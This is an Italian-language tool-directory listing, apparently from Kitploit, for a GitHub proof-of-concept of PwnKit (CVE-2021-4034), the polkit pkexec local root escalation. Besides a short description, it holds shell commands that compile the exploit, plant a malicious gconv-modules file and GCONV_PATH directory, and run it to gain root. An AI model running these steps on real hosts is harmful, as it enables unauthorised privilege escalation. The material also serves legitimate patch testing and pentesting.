Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
PwnKit-Vulnerability_CVE-2021-4034 — PwnKit - Vulnerabilità di escalation dei privilegi locali scoperta in pkexec di polkit (CVE-2021-4034) | Kitploit
Strumenti/GitHubGitHub/tw-d/pwnkit-vulnerability_cve-2021-4034
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingBinary Exploitation
GitHubtw-d/pwnkit-vulnerability_cve-2021-4034

PwnKit-Vulnerability_CVE-2021-4034

PwnKit - Vulnerabilità di escalation dei privilegi locali scoperta in pkexec di polkit (CVE-2021-4034)

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
4 anni faNon ancora revisionato

Vulnerabilità PwnKit - Escalation dei Privilegi Locali

  • Titolo: Vulnerabilità PwnKit - Escalation dei Privilegi Locali
  • Target: Linux
  • Categoria: Esecuzione
  • Crediti: Qualys Research Team

Descrizione

Il Qualys Research Team ha scoperto una vulnerabilità di corruzione della memoria in pkexec di polkit, un programma SUID-root installato per impostazione predefinita su ogni principale distribuzione Linux. Questa vulnerabilità, facilmente sfruttabile, consente a qualsiasi utente non privilegiato di ottenere pieni privilegi di root su un host vulnerabile sfruttando questa vulnerabilità nella sua configurazione predefinita.

PwnKit: Vulnerabilità di Escalation dei Privilegi Locali Scoperta in pkexec di polkit (CVE-2021-4034)

Testato su

Ubuntu 20.04.3 LTS x86_64

Versione pkexec 0.105

PoC

root@kitploit:~
mkdir /tmp/pwnkit_lpe/
gcc -shared -o /tmp/pwnkit_lpe/pwnkit.so -fPIC ./library.c
gcc ./exploit.c -o /tmp/pwnkit_lpe/pwnkit
echo "module UTF-8// PWNKIT// pwnkit 1" > /tmp/pwnkit_lpe/gconv-modules
mkdir -p "/tmp/pwnkit_lpe/GCONV_PATH=."
cp /usr/bin/true "/tmp/pwnkit_lpe/GCONV_PATH=./pwnkit.so:."
cd /tmp/pwnkit_lpe/
./pwnkit
Scarica lo strumento